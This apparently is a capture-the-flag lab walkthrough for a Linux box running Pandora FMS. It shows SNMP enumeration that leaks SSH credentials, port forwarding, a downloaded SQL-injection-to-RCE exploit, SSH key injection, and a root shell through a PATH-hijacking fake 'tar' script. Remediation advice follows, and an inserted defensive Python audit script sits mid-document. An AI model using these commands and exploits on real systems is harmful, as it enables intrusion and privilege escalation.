Enumeration

Nmap Scan

Initial reconnaissance revealed the following services:

nmap -sC -sV -p- 10.10.11.136

Key findings:

  • Port 22: SSH (OpenSSH 8.9p1)
  • Port 80: HTTP (Apache 2.4.52)
  • Port 161: SNMP (UDP)

Web Enumeration

The main website at port 80 appeared to be a basic company page. Technology profiling suggested WordPress, but further investigation proved otherwise.

Crawling & Fuzzing

Attempted various enumeration techniques:

  • Directory fuzzing with ffuf
  • Vhost enumeration
  • Content crawling with ReconSpider

All paths led nowhere, suggesting the need to pivot to other services.

SNMP Enumeration - UDP/161

SNMP (Simple Network Management Protocol) can reveal valuable information when a device still answers to a default community string.

Testing default community string “public”:

snmpwalk -v2c -c public 10.10.11.136

Credentials discovered:

daniel:HotelBabylon23

Initial Access

SSH Authentication

Successfully authenticated using the SNMP-discovered credentials!

Post-Compromise Enumeration

# Check current user
id

# Enumerate users with shells
grep -v nologin /etc/passwd

# Find SUID binaries
find / -perm -4000 2>/dev/null

Key finding: /usr/bin/pandora_backup - SUID binary (not yet executable by daniel)

Internal Web Server Discovery

Checking Apache configuration:

ls -la /etc/apache2/sites-enabled/
cat /etc/apache2/sites-enabled/pandora.conf

Discovery: Internal Pandora FMS instance running on localhost!

<VirtualHost localhost:80>
    ServerAdmin [email protected]
    DocumentRoot /var/www/pandora
    ...
</VirtualHost>

Port Forwarding

Accessing the internal web server via SSH local port forwarding:

ssh -L 8081:127.0.0.1:80 [email protected]

Now accessible at http://localhost:8081 on the attack box!

Exploitation - Pandora FMS

Version Identification

Pandora FMS v7.0NG.742 - vulnerable version discovered!

CVE Research

Found unauthenticated SQL injection leading to RCE:

  • SQL injection in chart_generator.php via session_id parameter
  • Chained with authenticated RCE vulnerability

Exploit Execution

# Download exploit
wget https://github.com/[exploit-repo]/pandora-sqli-rce.py

# Execute against internal instance
python3 pandora-sqli-rce.py -t http://localhost:8081

Result: Command execution as user matt!

whoami
# matt

cat /home/matt/user.txt
# [user flag]

Lateral Movement - Daniel → Matt

To get a stable shell, we need SSH access as matt.

SSH Key Injection

# Create .ssh directory
mkdir /home/matt/.ssh

# Generate SSH key pair on attacker machine
ssh-keygen -f matt_key

# URL-encode the public key (for GET request)
# Use CyberChef or similar tool

# Inject public key via RCE
echo "ssh-rsa AAAA..." > /home/matt/.ssh/authorized_keys

SSH Access

ssh -i matt_key [email protected]

Stable shell as matt achieved!

Privilege Escalation

SUID Binary Analysis

Remember /usr/bin/pandora_backup? Now we can execute it!

ls -la /usr/bin/pandora_backup
# -rwsr-x--- 1 root matt 16816 Dec  3 15:58 /usr/bin/pandora_backup

Static Analysis

Transfer binary to local machine for analysis:

# On target
base64 /usr/bin/pandora_backup

# On attacker machine
echo '[base64_output]' | base64 -d > pandora_backup

# Analyze with strings
strings pandora_backup

Vulnerability discovered: PATH injection!

The binary calls tar without an absolute path:

tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora
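As an added defensive example (not a tool from the original writeup): a small Python audit that scans `strings` output for command-shaped lines naming a program without an absolute path, the PATH-injection pattern found here. The sample strings are constructed, not the real binary's output.

```python
import re
from typing import Iterable, List, NamedTuple, Optional

# Constructed sample (not the real binary's output): what `strings` might print
# for a small SUID backup helper like the one described in this writeup.
SAMPLE_STRINGS = """\
__libc_start_main
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora
/usr/bin/chmod 600 /root/.backup/pandora-backup.tar.gz
Backup successful!
GCC: (Ubuntu 11.2.0-19ubuntu1) 11.2.0
""".splitlines()

# A string "looks like a command" when it starts with a program name (relative
# or absolute) followed by at least one flag (-x/--xx) or filesystem path (/...).
CMD_RE = re.compile(r"^(?P<prog>(?:/[\w.+-]+)+|[\w.+-]+)\s+(?P<args>.+)$")
ARG_HINT_RE = re.compile(r"(?:^|\s)(?:-{1,2}\w|/)")


class Finding(NamedTuple):
    line: str
    program: str
    absolute: bool   # False => resolved through the caller's PATH at runtime


def command_like(line: str) -> Optional[Finding]:
    """Return a Finding for a command-shaped string, or None for anything else."""
    m = CMD_RE.match(line.strip())
    if not m or not ARG_HINT_RE.search(m.group("args")):
        return None
    prog = m.group("prog")
    return Finding(line.strip(), prog, prog.startswith("/"))


def audit_strings(lines: Iterable[str]) -> List[Finding]:
    """Every command-like string, in order, with its absolute/relative verdict."""
    return [f for f in (command_like(l) for l in lines) if f is not None]


def relative_invocations(lines: Iterable[str]) -> List[Finding]:
    """Only the PATH-dependent invocations: the ones a reviewer must fix first."""
    return [f for f in audit_strings(lines) if not f.absolute]


if __name__ == "__main__":
    for f in audit_strings(SAMPLE_STRINGS):
        print(("RISK" if not f.absolute else "OK  "), f.program, "<-", f.line)
```

This is a heuristic: a command string assembled at runtime from several format pieces will not appear as one line in `strings` output and will be missed.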

Exploitation

Create Malicious tar Binary

cd /home/matt
cat > tar << 'EOF'
#!/bin/bash
/bin/bash -p
EOF

chmod +x tar

Modify PATH

export PATH=/home/matt:$PATH

Execute Vulnerable Binary

/usr/bin/pandora_backup

ROOT SHELL OBTAINED!

whoami
# root

cat /root/root.txt
# [root flag]

Key Takeaways

Vulnerabilities Exploited

  1. SNMP Misconfiguration - Default community string exposed credentials
  2. Outdated Pandora FMS - SQL injection + RCE chain (CVE-2021-32099)
  3. PATH Injection - SUID binary calling external programs without absolute paths

Remediation

  • Change default SNMP community strings to complex values
  • Keep software updated (especially web applications)
  • Use absolute paths in SUID binaries
  • Apply principle of least privilege
  • Disable unnecessary services (SNMP if not needed)

Techniques Used

  • SNMP enumeration (snmpwalk)
  • SSH local port forwarding
  • SQL injection → RCE chaining
  • SUID exploitation via PATH injection
  • Binary static analysis (strings)

Tools Used

  • nmap
  • snmpwalk
  • ffuf
  • ssh
  • strings
  • base64